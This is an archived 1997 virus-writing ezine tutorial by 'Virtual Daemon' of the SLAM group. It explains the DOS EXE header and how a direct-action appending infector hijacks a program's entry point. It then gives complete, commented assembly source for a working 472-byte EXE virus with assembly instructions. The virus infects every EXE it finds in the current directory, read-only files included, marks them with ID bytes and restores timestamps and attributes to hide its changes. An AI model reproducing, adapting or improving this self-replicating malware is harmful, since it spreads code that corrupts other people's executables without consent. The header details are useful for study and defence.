Copy Link
Add to Bookmark
Report

SLAM4.019: Direct EXE infection tutorial by Virtual Daemon/SLAM

eZine's profile picture
Published in 
Slam
 · 3 Mar 2022

Direct EXE infection tutorial
by Virtual Daemon


Well, here we go again... ;) This time, with something more "advanced"! :P Now that U've seen how a direct COM virus works, it's time to check out on the other friend of the programmer: the EXE file. Again, I must tell ya that the informations provided in this tutorial are only for the beginners corner, so if U have already made a simple EXE infector, I don't see the point for U to hang around here anymore... Go away and do something more usefull... Clean the house, cook dinner, drink a beer, go to a movie, or whatever U feel like doing now, but please .... GO! :)

Ok. Since U're still here, I imagine that U don't know what the hell is an EXE file, how it works and how to infect it... Well relax, bcoz this little tutorial will do the trick for U. I'll try to keep it as simple as I can, and I'll make sure that U will get all this crap. So, hold on in there bcoz U aint going nowhere till U get this... :)

First of all, you need to know what is a EXE program, how it works, and what is it's structure. I wont give you too much technical shit, bcoz U wont understand it anyway. Don't worry it will come to you later, after you work on it for a while.

Well, in my previous tutorial (Direct COM infections) I told you that COM files are the simplest binary programs, also called memory images. Due to the restriction of its size (max 64K=size of a segment), the COM programs aren't used so more this days... The programmer is trying to develop a good software or a large application and that takes some space. So, here begins our little trip to the EXEland... :)

COM programs are still used for small, tiny applications or utilities, but the true power of a program lies in a EXE file.

"So, how can a EXE program be so different from a COM one?", you wonder... Well, the main advantage of the EXE program is that it's size isn't limited to 64k. That means that a EXE program can have any size U want it to have... The only thing that will stop you is your RAM or your HD!

Anyway, a program bigger than 64k can't be loaded and executed in a single segment anymore! Well, this is the most important feature of an EXE file: it can have more then one segment. So, from now on, U wont be forced to erase parts of your application, or destroy some of your variables just bcoz you can't put all your stuff in those 64k and these limits will stop ya... :)

Well, now U know that the EXE files may make use of multiple segments for code, stack, and data. The design of the EXE file reflects the segmented design of the Intel 80x86 CPU architecture.

Another important thing would be that a EXE program can be loaded in any memory location. This fact impose the adjustment of all your instructions that contains segment addresses, like:

  • JMP/CALL FAR PTR name
  • MOV reg, SEG name
  • MOV reg_seg, value

This process is called "relocation" and it's executed when the program loads in memory. Anyway, this isn't so important for you right now... ;)

Well, it is *ABSOLUTELY* obvious that an EXE program must contain, besides your program (code) some technical informations about the relocable simbols, the start address, the address of the stack segment, etc. This informations are stored in the first part of your EXE file, part called "the EXE header".

So, a EXE file is separated in 2 parts: the header and the real program.

Now that you know all this, let's see how does the EXE header looks like:

⁄--------¬------¬----------¬-------------------------------------------ø 
| Offset | Size | Contents | Description |
√--------≈------≈----------≈-------------------------------------------¥
|˘ 0h | Word | 4Dh 5Ah | EXE signature (4Dh='M' and 5Ah='Z').These |
| | | | 2 ASCII letters (M and Z) stand for Mark |
| | | | Zbikowski, one of the major DOS coders at |
| | | | Microsoft. Note: in some cases the MZ can |
| | | | be replaced with ZM (5Ah 4Dh) |
√--------≈------≈----------≈-------------------------------------------¥
|˛ 2h | Word | PartPag | Length of file mod (modulo) 512 |
| | | |length mod 512=nr of bytes in the last page|
√--------≈------≈----------≈-------------------------------------------¥
|˛ 4h | Word | PageCnt | Size of the file in 512 byte pages |
| | | | including the header. If the last page is |
| | | | not full it is still included in the count|
√--------≈------≈----------≈-------------------------------------------¥
| 6h | Word | ReloCnt | Number of items in relocation table |
√--------≈------≈----------≈-------------------------------------------¥
| 8h | Word | HdrSize | Size of the header in 16-byte paragraphs. |
| | | | This is used to locate the beginning of |
| | | | the real program (load module) in the file|
√--------≈------≈----------≈-------------------------------------------¥
| 0Ah | Word | MinMem | Minimum memory required above the end of |
| | | | the loaded program in 16-byte paragraphs. |
√--------≈------≈----------≈-------------------------------------------¥
| 0Ch | Word | MaxMem | Maximum memory required above the end of |
| | | | the loaded program in 16-byte paragraphs. |
| | | | If the minimum and maximum number of |
| | | | paragraphs are both zero, the program will|
| | | | be loaded as high in memory as possible. |
√--------≈------≈----------≈-------------------------------------------¥
|˛ 0Eh | Word | ReloSS | Segment offset of stack segment.(Used for |
| | | | setting the SS register) |
√--------≈------≈----------≈-------------------------------------------¥
|˛ 10h | Word | ExeSP | Value for SP register (stack pointer) when|
| | | | the program is started. |
√--------≈------≈----------≈-------------------------------------------¥
|˘ 12h | Word | Checksum | Negative sum of all the words in the file |
| | | | ignoring overflow. Good place to store |
| | | | the ID bytes of your virus... :) |
√--------≈------≈----------≈-------------------------------------------¥
|˛ 14h | Word | ExeIP | Value for IP register (initial instruction|
| | | | pointer) when the program is started. |
√--------≈------≈----------≈-------------------------------------------¥
|˛ 16h | Word | ReloCS | Segment offset of code segment. (Used for |
| | | | setting the CS register) |
√--------≈------≈----------≈-------------------------------------------¥
|˘ 18h | Word | TablOff | File offset of the relocation table. |
| | | | (Often set to 1Ch) |
√--------≈------≈----------≈-------------------------------------------¥
|˘ 1Ah | Word | Overlay | Overlay marker (0 for base module). |
√--------≈------≈----------≈-------------------------------------------¥
| 1Ch | Byte | ? | (undocumented) Usually equal to 01h, this |
| | | | value indicates the size of formatted |
| | | | portion of EXE header. |
√--------≈------≈----------≈-------------------------------------------¥
| ? | 4*? | Ofs Seg | Relocation table. |
| | | .... | Has [EXE+6] DWORD entries. |
| | | Ofs Seg | |
√--------≈------≈----------≈-------------------------------------------¥
| ? | ? | | Filler to a paragraph boundry. |
¿--------¡------¡----------¡-------------------------------------------Ÿ


Note: the offsets marked with

  • '˛' = important for our virus
  • '˘' = optional for our virus

Ok. Why important offsets and why optional? Well, the optional offset can be used for checking different things like:

  • the EXE signature (MZ or ZM) can be used to check if the file you have found is really an EXE file and not just a ordinary re-named file;
  • the Checksum from offset 12h can be a good place to store your ID bytes (ID bytes=one or two bytes that will "mark" an infected file);
  • the TablOff from offset 18h can be used to check if the file is a normal DOS EXE file or if is a PE or NE file. To check this see if the TablOff is greater then 64 (40h). If it is then the EXE file is in NE or PE format and you wont be able to infect it... Important Note: all "normal" Windows EXE files have TablOff equal to '@'!
  • the Overlay word value located at offset 1Ah can be used to check if the file has overlays or not. To check this, compare the Overlay with 0. If equal then the file doesn't have overlays and all it's ok. If not, then the file has internal overlays (in most of the cases) and by infecting it you will destroy the informations.

It will be very good if U could do some test with the EXE header, like open a bunch of EXE files and read some infos from the header (like PartPag and PageCnt) and then compare them with the real values (the real size of the file). To find the size of a file use the following formula:

 Size_of_File:=((PageCnt-1)*512)+PartPag


The relocation table contains the addresses of all the words that needs "adjustement". The relocation table has ReloCnt elements beginning at TablOff position in the file, and it it's size is ReloCnt*4 bytes.

Now that you know how the EXE files look, let's take a look at how it works.

The relocation of the program is done by the DOS Exec function (4bh) and contains the following steps:

  1. Create a PSP via DOS Function 26h
  2. Read 1Ch bytes from the EXE file (the formatted portion of the EXE header) into a local memory area
  3. Determine the load module size = ((PageCnt*512)-(HdrSize*16))-PartPag
  4. Determine file offset of load module = (HdrSize*16)
  5. Select a segment address START_SEG for loading (usually PSP+10h)
  6. Read the load module into memory starting at START_SEG:0000
  7. LSEEK (set file pointer) to the start of the relocation table (TablOff)
  8. For each relocation item (ReloCnt):
    • read the item as two 16-bit words (I_OFF,I_SEG)
    • find the address of relocation ref RELO_SEG=(START_SEG+I_SEG)
    • read the current value, the word from address RELO_SEG:I_OFF
    • perform the segment fixup by adding START_SEG to that word
    • store the value back to its original address (RELO_SEG:I_OFF)

  9. Allocate memory for the program according to MinMem and MaxMem
  10. Initialize registers and execute program:
    • ES=DS=PSP
    • SS=START_SEG+ReloSS
    • SP=ExeSP
    • CS=START_SEG+ReloCS
    • IP=ExeIP

Note: the initialization of CS and IP is done by

PUSH START_SEG+ReloCS 
PUSH ExeIP
RETF


Well, I hope this covers all you wanted and have to know about EXE programs. Now let's get back to some action...;P First the theory and then the code.

EXE infection isn't that different from COM infection. The main difference between the 2 types of infection is that the EXE one needs some calculations. You learned (I hope ;) how a COM virus replicates: save the 1st 3 (or more) bytes from BOF (beginning of program) in a buffer, go to the EOF (end of file) and write the virus body, build a JMP instruction with the location to the end of file (respectively our virus), then write the new JMP to BOF and finally restore control to original program (host). Well EXE infection is mostly the same shit. Aehm... here are the steps:

  • read the EXE header (from BOF of course ;) in a buffer (1ch bytes)
  • save from the EXE header some values that will be needed when we'll pass control to the original file (ReloSS, ExeSP, ExeIP and ReloCS from 0eh, 10h, 14h and 16h - respectively SS, SP, IP and CS registers)
  • calculate new values (offsets) for stack segment (SS) and code segment (CS), adjust the IP register (see bellow)
  • go to EOF and write the virus body
  • calculate new values for PartPag (offset 02h) and PageCnt (offset 04h) (see bellow)
  • go to BOF and overwrite the old header with our new copy
  • pass control to our host by reseting stack to original value and by setting the CS:IP to point to original entry point, and DS and ES to point to PSP.

Well, like I said for this is just pure theory... I'll try to explain some of it now, and then we'll get to our real goal... :)

I bet you are wondering what is that bullshit with "calculating new values for CS:IP"... Well, if we look a little to the EXE header we see what this values means!

 CS:IP=ReloCS:ExeIP


ReloCS = offset of code segment... this value represents the offset of the program's code. Why are we modifying this? Well, we must make the file to jump to our virus first, right? This can't be done like we've done it with COMs, by putting a JMP to beginning of file. All we have to do on EXEs is to make the ReloCS to point to our virus instead of pointing to the real code.Then, when the virus has finished its work, we will pass control to the real program by putting back the old ReloCS value (in memory, not on disk).

ExeIP = value for IP register when the program is started... But what is this IP register anyway? The IP register contains the address of the current instruction. So, we'll modify the IP register to point to our first instruction from the virus body (the entry point of our virus).

This is the part with the calculation of CS and IP. The SS (stack segment) register should be equal to CS (code segment), so after you have found out the value for CS, just equal SS to it too (for calculation, see the virus).

The next important thing that must be modified from the EXE header is PartPag and PageCnt. Since the file has grown in size, we must re-calculate the file size and we must overwrite offsets 2 and 4 with the new values.

That's all... It's easy isn't it?

Now... the virus! If you don't get something from above, now it's the chance for you to understand.

Btw, this isn't the simplest EXE infector... it's just the simplest DECENT EXE infector. All the code is well commented, so you shouldn't have any problem understanding it.

All the steps are directly written in the virus code... It's easier to get it this way, believe me!

Well, here it is... it's not my best, but i'm sure it's hell enough for you to learn the basic EXE appender. The code is not very well optimized... well, I guess that this is ur job! :-)) Bugs? Hmm... don't know any... if there are, learn by correcting them. ;)

Have fun!

---------- cut here ---------- 
; Name: Example
; Type: Direct appending EXE infector
; Size: 472 bytes
; Comments: the virus will search for EXE files in current directory. If no
; filles are found, the virus will restore control to its host. If
; it founds EXEs, he will try to infect the first one. If the file
; has been already infected, he will close the file and search for
; another one. The cycle will repeat untill all the EXE filles from
; current directory are infected.
; The virus infects read-only filles and restore time/date/attributes.
; The virus will check too see if: - the file is really EXE (MZ scan)
; - the file is a Windows EXE
; - the file has internal overlays
; Assembled with: tasm example.asm
; tlink /t example.obj
code segment
assume cs:code,ds:code
org 100h ;starts at 100h => 1st host will be a COM file
virus_start:
db 0e9h,3,0 ;jump to begin
our_host:
db 0cdh,20h,0 ;=Int 20h
begin:
call find_offset
find_offset:
; -------------------- Step 1 - Calculate the DELTA offset --------------------
pop bp ;bp holds IP at start
sub bp,offset find_offset ;=>bp=delta offset

push ds es ;save original DS and ES

push cs
pop ds ;CS=DS

; ----------------- Step 2 - Save parts of the header on stack ----------------
; _cs is the offset used by our JMP instruction to return to the host
; exe_cs is the original CS register
mov ax,word ptr [bp+exe_cs] ;equal _cs with exe_cs
mov word ptr [bp+_cs],ax

;save CS:IP and SS:SP on stack
push [bp+exe_cs] ;save CS
push [bp+exe_ip] ;save IP
push [bp+exe_ss] ;save SS
push [bp+exe_sp] ;save SP

; -------------------------- Step 3 - Set a new DTA ---------------------------
mov ah,1ah ;DOS function=Set Disk Transfer Address
lea dx,[bp+offset dta] ;set a new DTA buffer
int 21h

; ------------------------- Step 4 - Find a EXE file --------------------------
mov ah,4eh ;DOS function=Find 1st Matching File
lea dx,[bp+filespec] ;search for "filespec" files only (*.EXE)
mov cx,7 ;any file attribute
do_it:
int 21h
jnc next_step ;if no error, continue
jmp exit ;if error then pass control to host
next_step:
; ----------------------- Step 5 - Get file attributes ------------------------
mov ax,4300h ;DOS function=Get File Attributes
lea dx,[bp+offset dta+1eh] ;get file name from DTA (offset 1eh)
int 21h
mov word ptr [bp+file_attr],cx ;save the file attributes

; ----------------- Step 6 - Set new attributes (archive only) ----------------
mov ax,4301h ;DOS function=Set File Attributes
lea dx,[bp+offset dta+1eh] ;get file name from DTA (offset 1eh)
xor cx,cx ;set archive only attributes
int 21h

; ------------------- Step 7 - Open file for RW (read-write) ------------------
mov ax,3d02h ;DOS function=Open File For Read-Write
lea dx,[bp+offset dta+1eh] ;get file name from DTA (offset 1eh)
int 21h
jnc continue ;if no error, continue
jmp abort ;if error put old attributes and search for
;another file
continue:
xchg bx,ax ;put file handle in bx

; ------------------------ Step 8 - Get file time/date ------------------------
mov ax,5700h ;DOS function=Get File Time/Date
int 21h
mov word ptr [bp+file_time],cx ;save file time
mov word ptr [bp+file_date],dx ;save file date

; ------------------------ Step 9 - Read the Exe header -----------------------
mov ah,3fh ;DOS function=Read From File
mov cx,1ch ;read the EXE header (1ch bytes)
lea dx,[bp+offset header] ;store it into our 'header' buffer
int 21h

; ----------------- Step 10 - Check if the file is a real EXE -----------------
cmp word ptr [bp+header],'ZM' ;check if the 1st 2 bytes are MZ or ZM
je infect
cmp word ptr [bp+header],'MZ'
je infect
jmp another ;if not equal then the file isn't a real EXE
;it's just a re-named file
infect:
; -------------- Step 11 - Check if the file is already infected --------------
cmp word ptr [bp+header+10h],'DV' ;check for our ID bytes
jne done
jmp another ;if equal then the file has already been
;infected
done:
; --------------- Step 12 - Check if the file is a Windows EXE ----------------
;Note: you could also check for NE or PE by comparing if greater then 64
cmp byte ptr [bp+header+18h],'@' ;check to see if the file is a WinEXE
jne no_win
jmp another ;oups... WinEXE here. We can't infect it this
;way...
no_win:
; ------------- Step 13 - Check if the file has internal overlays -------------
cmp word ptr [bp+header+1ah],0 ;check for internal overlays
je no_overlay
jmp another
no_overlay:
push bx ;save file handle

; -------------- Step 14 - Save important parts from the header ---------------
mov ax,word ptr [bp+header+0eh] ;save SS
mov word ptr [bp+exe_ss],ax
mov ax,word ptr [bp+header+10h] ;save SP
mov word ptr [bp+exe_sp],ax
mov ax,word ptr [bp+header+14h] ;save IP
mov word ptr [bp+exe_ip],ax
mov ax,word ptr [bp+header+16h] ;save CS
mov word ptr [bp+exe_cs],ax

; ------------------- Step 15 - Seek to EOF (end of file) ---------------------
mov ax,4202h ;DOS function=Set File Pointer (Seek) to EOF
xor cx,cx
cwd
int 21h

push ax dx ;ax and dx holds the file size

; ---------------- Step 16 - Calculate the new CS:IP address ------------------
;
; Short theory
; ------------
;
; We need to get the size of the EXE header in paras. Then we have to convert
; it into bytes (by multiplying with 16). After this, we have to substract the
; header size from the file size, and then to put it back into the seg:ofs form.
; We accomplish this by divideing with 16.
;
mov bx,word ptr [bp+header+8h] ;get the size of the header in para
;a paragraph is 16 bytes and we need the size in bytes, so we multiply by 16
mov cl,4
shl bx,cl ;shl will rotate the bits to left with 4
;positions. this is the same result as
;multiplying with 16.
;now, BX is equal to length of header in bytes
;AX holds the filesize (low word)
sub ax,bx ;now we substract the size of the header from
;the size of the file
sbb dx,0 ;if CF is set it will substract 1, else 0
;now, DX:AX will contain the file size-the size of the header

;we must convert the DX:AX to segment:offset form because now it's just a value
;for converting to segment:offset we must divide by 16 (it's obvious why...we
;multiplyed by 16 when we had to trasform into bytes... now we're going back)
mov cx,10h ;cx=10h=16

div cx ;divide by 16
; AX=(DX:AX) / 16
; DX=(DX:AX) mod 16
;now, the DX:AX contains the CS:IP entry point (stored backwards - IP:CS)

;save the new CS:IP in the header buffer. also save the SS and put our ID bytes.
mov word ptr [bp+header+14h],dx ;put the offset (ExeIP)=new entry point
mov word ptr [bp+header+16h],ax ;put the segment offset of code seg
mov word ptr [bp+header+0eh],ax ;put the segment offset of stack seg
mov word ptr [bp+header+10h],'DV' ;put our ID bytes at 10h
; blah... you could use 12h (ChkSum) instead of 10h...

pop dx ax bx ;restore original file size and file handle

; ---------- Step 17 - Calculate new values for PartPag and PageCnt -----------
;
; Short theory
; ------------
;
; This one is simple. All we have to do, is to add the size of our virus
; to the size of the file, and then to convert it into pages by divideing with
; 512.
;

; AX and DX holds the file size
add ax,heap-begin ;add the virus size to the original file size
adc dx,0 ;if CF add 1, else 0
mov cx,512 ;convert the result into pages by divideing
div cx ;with 512
inc ax ;add one for rounding up
mov word ptr [bp+header+4],ax ;put new PageCnt
mov word ptr [bp+header+2],dx ;put new PartPag

; ------------------- Step 18 - Write the virus body to EOF -------------------
mov ah,40h ;DOS function=Write To File
mov cx,heap-begin ;cs=size to write=size of our virus
lea dx,[bp+offset begin] ;start from "begin"
int 21h

; ----------------- Step 19 - Seek to BOF (beginning of file) -----------------
mov ax,4200h ;DOS function=Set File Pointer (Seek) to BOF
xor cx,cx
cwd
int 21h

; ---------------------- Step 20 - Write the new header -----------------------
mov ah,40h ;DOS function=Write To File
mov cx,1ch ;cx=size to write=size of the EXE header
lea dx,[bp+offset header] ;write from "header" buffer
int 21h

; ----------------- Step 21 - Restore original file time/date -----------------
mov dx,word ptr [bp+file_date] ;dx=original date value
mov cx,word ptr [bp+file_time] ;cx=original time value
mov ax,5701h ;DOS function=Set File Time/Date
int 21h
another:
; ------------------------- Step 22 - Close the file --------------------------
mov ah,3eh ;DOS function=Close File
int 21h
abort:
; ------------------- Step 23 - Restore original attributes -------------------
mov ax,4301h ;DOS function=Set File Attributes
lea dx,[bp+offset dta+1eh] ;get file name from DTA
mov cx,word ptr [bp+file_attr] ;restore original attributes
int 21h

; -------------------- Step 24 - Search for a new EXE file --------------------
mov ah,4fh ;DOS funtion=Find Next Matching File
lea dx,[bp+filespec] ;search for "filespec" files only (*.EXE)
jmp do_it
exit:
; ------------- Step 25 - Restore parts of the header from stack --------------
;restore CS:IP and SS:SP from stack
pop [bp+exe_sp] ;restore SP
pop [bp+exe_ss] ;restore SS
pop [bp+exe_ip] ;restore IP
pop [bp+exe_cs] ;restore CS
; ------------------------- Step 26 - Restore the DTA -------------------------
mov ah,1ah ;DOS function=Set Disk Transfer Address
mov dx,80h ;change the DTA to original (DTA is stored at 80h in the PSP)
int 21h

pop es ds ;restore ES and DS registers

; ------------------- Step 27 - Restore control to the host -------------------
mov ax,es ;ax will point to PSP
add ax,10h ;skip over PSP (ax<-PSP+10h)
add word ptr cs:[bp+_cs],ax

; _ip is one of the offsets for our jump to return to the host
; see step 2 for setting CS
mov bx,word ptr cs:[bp+exe_ip] ;make _ip equal with exe_ip
mov word ptr cs:[bp+_ip],bx

cli ;clear interrupt flag
mov sp,word ptr cs:[bp+exe_sp] ;adjust ExeSP
add ax,word ptr cs:[bp+exe_ss] ;restore the stack
mov ss,ax ;adjust ReloSS
sti ;set interrupt flag

xor ax,ax ;clear registers: ax,bx,cx,dx,si,di
xor bx,bx
xor cx,cx
xor dx,dx
xor di,di
xor si,si
xor bp,bp

db 0eah ;jmp far ptr seg:ofs (CS:IP)
_ip dw 0 ;IP and CS registers used as offset for
_cs dw 0 ;db 0eah (JMP) instruction

;these are the original values for CS:IP and SS:SP
exe_cs dw 0fff0h ;CS:IP
exe_ip dw 0
exe_sp dw 0 ;SS:SP
exe_ss dw 0
filespec db '*.exe',0
heap: ;this is the end of the virus
file_attr dw ?
file_time dw ?
file_date dw ?
header db 1ch dup (?)
dta db 43 dup (?)
code ends
end virus_start
---------- cut here ----------


Virtual Daemon / SLAM 1997

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT